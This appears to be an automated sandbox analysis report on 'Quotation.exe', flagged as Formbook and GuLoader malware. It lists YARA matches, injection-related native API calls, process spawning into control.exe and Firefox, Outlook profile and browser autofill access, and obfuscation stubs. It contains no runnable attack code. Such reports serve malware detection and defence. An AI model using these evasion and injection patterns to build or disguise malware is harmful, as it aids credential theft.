Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Quotation.exe
Uses 32bit PE files
Source: Quotation.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
One or more processes crash
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2836 -s 284
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403235
Detected potential crypto function
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_00406666 1_2_00406666
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_6D261A98 1_2_6D261A98
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_04F87412 1_2_04F87412
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354E310 10_2_3354E310
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FF330 10_2_335FF330
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33531380 10_2_33531380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F124C 10_2_335F124C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352D2EC 10_2_3352D2EC
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3358717A 10_2_3358717A
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352F113 10_2_3352F113
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DD130 10_2_335DD130
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3360010E 10_2_3360010E
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335451C0 10_2_335451C0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355B1E0 10_2_3355B1E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335EE076 10_2_335EE076
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354B0D0 10_2_3354B0D0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F70F1 10_2_335F70F1
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3357508C 10_2_3357508C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335300A0 10_2_335300A0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F6757 10_2_335F6757
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33542760 10_2_33542760
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354A760 10_2_3354A760
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335ED646 10_2_335ED646
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33564670 10_2_33564670
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355C600 10_2_3355C600
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335DD62C 10_2_335DD62C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FA6C0 10_2_335FA6C0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FF6F6 10_2_335FF6F6
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353C6E0 10_2_3353C6E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B36EC 10_2_335B36EC
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540680 10_2_33540680
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3360A526 10_2_3360A526
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FF5C9 10_2_335FF5C9
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F75C6 10_2_335F75C6
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540445 10_2_33540445
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33540B10 10_2_33540B10
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3357DB19 10_2_3357DB19
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FFB2E 10_2_335FFB2E
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B4BC0 10_2_335B4BC0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FEA5B 10_2_335FEA5B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FCA13 10_2_335FCA13
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FFA89 10_2_335FFA89
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335859C0 10_2_335859C0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353E9A0 10_2_3353E9A0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FE9A6 10_2_335FE9A6
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33549870 10_2_33549870
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355B870 10_2_3355B870
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FF872 10_2_335FF872
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33526868 10_2_33526868
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356E810 10_2_3356E810
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33543800 10_2_33543800
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335E0835 10_2_335E0835
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F18DA 10_2_335F18DA
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335428C0 10_2_335428C0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33556882 10_2_33556882
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FFF63 10_2_335FFF63
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354CF00 10_2_3354CF00
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F1FC6 10_2_335F1FC6
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33546FE0 10_2_33546FE0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335FEFBF 10_2_335FEFBF
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33560E50 10_2_33560E50
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Quotation.exe Code function: String function: 3352B910 appears 190 times
Source: C:\Users\user\Desktop\Quotation.exe Code function: String function: 33587BE4 appears 74 times
Source: C:\Users\user\Desktop\Quotation.exe Code function: String function: 335AE692 appears 69 times
Source: C:\Users\user\Desktop\Quotation.exe Code function: String function: 335BEF10 appears 71 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335734E0 NtCreateMutant,LdrInitializeThunk, 10_2_335734E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572B10 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_33572B10
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572BC0 NtQueryInformationToken,LdrInitializeThunk, 10_2_33572BC0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572B90 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_33572B90
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335729F0 NtReadFile,LdrInitializeThunk, 10_2_335729F0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572F00 NtCreateFile,LdrInitializeThunk, 10_2_33572F00
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572E50 NtCreateSection,LdrInitializeThunk, 10_2_33572E50
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572ED0 NtResumeThread,LdrInitializeThunk, 10_2_33572ED0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572EB0 NtProtectVirtualMemory,LdrInitializeThunk, 10_2_33572EB0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572D10 NtQuerySystemInformation,LdrInitializeThunk, 10_2_33572D10
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_33572DC0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572DA0 NtReadVirtualMemory,LdrInitializeThunk, 10_2_33572DA0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572C50 NtUnmapViewOfSection,LdrInitializeThunk, 10_2_33572C50
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572C30 NtMapViewOfSection,LdrInitializeThunk, 10_2_33572C30
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572CF0 NtDelayExecution,LdrInitializeThunk, 10_2_33572CF0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33574260 NtSetContextThread, 10_2_33574260
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33574570 NtSuspendThread, 10_2_33574570
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572B00 NtQueryValueKey, 10_2_33572B00
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572B20 NtQueryInformationProcess, 10_2_33572B20
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572BE0 NtQueryVirtualMemory, 10_2_33572BE0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572B80 NtCreateKey, 10_2_33572B80
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572A10 NtWriteFile, 10_2_33572A10
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572AC0 NtEnumerateValueKey, 10_2_33572AC0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572A80 NtClose, 10_2_33572A80
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572AA0 NtQueryInformationFile, 10_2_33572AA0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335729D0 NtWaitForSingleObject, 10_2_335729D0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335738D0 NtGetContextThread, 10_2_335738D0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572F30 NtOpenDirectoryObject, 10_2_33572F30
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33572FB0 NtSetValueKey, 10_2_33572FB0
PE file contains executable resources (Code or Archives)
Source: System.dll0.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file does not import any functions
Source: System.Security.Cryptography.X509Certificates.dll.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemaintenanceservice.exe0 vs Quotation.exe
Source: Quotation.exe, 00000001.00000002.21944394921.0000000000436000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs Quotation.exe
Source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Security.Cryptography.X509Certificates.dll@ vs Quotation.exe
Source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.dll@ vs Quotation.exe
Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSolutionExplorerCLI.dll vs Quotation.exe
Source: Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepkcs11-helper-1.dll" vs Quotation.exe
Source: Quotation.exe, 0000000A.00000003.22626322501.00000000332CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
Source: Quotation.exe, 0000000A.00000000.21846769970.0000000000436000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs Quotation.exe
Source: Quotation.exe, 0000000A.00000002.22757544824.0000000002F8C000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Quotation.exe
Source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Quotation.exe
Source: Quotation.exe, 0000000A.00000003.22633102338.000000003347F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
Source: Quotation.exe, 0000000A.00000002.22771863781.00000000337D0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
Source: Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
Source: Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Quotation.exe
Source: Quotation.exe Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs Quotation.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Quotation.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: edgegdi.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: Quotation.exe Static PE information: invalid certificate
PE file contains more sections than normal
Source: percentile.dll.1.dr Static PE information: Number of sections : 19 > 10
Source: libdatrie-1.dll.1.dr Static PE information: Number of sections : 11 > 10
Source: libpkcs11-helper-1.dll.1.dr Static PE information: Number of sections : 12 > 10
Source: Quotation.exe Virustotal: Detection: 18%
Source: Quotation.exe ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\Quotation.exe File read: C:\Users\user\Desktop\Quotation.exe Jump to behavior
Source: Quotation.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Quotation.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
Source: C:\Users\user\Desktop\Quotation.exe Process created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2836 -s 284
Source: C:\Users\user\Desktop\Quotation.exe Process created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403235
Source: C:\Users\user\Desktop\Quotation.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File created: C:\Users\user\AppData\Local\Temp\nsmFC66.tmp Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@11/11@18/15
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_00402138 CoCreateInstance,MultiByteToWideChar, 1_2_00402138
Source: C:\Users\user\Desktop\Quotation.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 1_2_004044FA
Source: 4995H5Jfc.13.dr Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Quotation.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
Source: Binary string: maintenanceservice.pdb@ 0%P% source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
Source: Binary string: mshtml.pdb source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
Source: Binary string: control.pdb source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr
Source: Binary string: wntdll.pdb source: Quotation.exe, Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: control.pdbUGP source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source: Binary string: maintenanceservice.pdb source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
Source: Binary string: firefox.pdb source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.21946690040.00000000050B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_6D262F60 push eax; ret 1_2_6D262F8E
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_04F808C0 push ebp; retf 1_2_04F808C3
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_04F86274 push ebp; retf 1_2_04F8627C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_04F84A2E push edx; retf 1_2_04F84A2F
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_04F80604 push esi; ret 1_2_04F80605
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_04F85F8F push edi; retf 1_2_04F85F90
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_04F8694F push edi; ret 1_2_04F86950
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_04F86525 push edi; iretd 1_2_04F86526
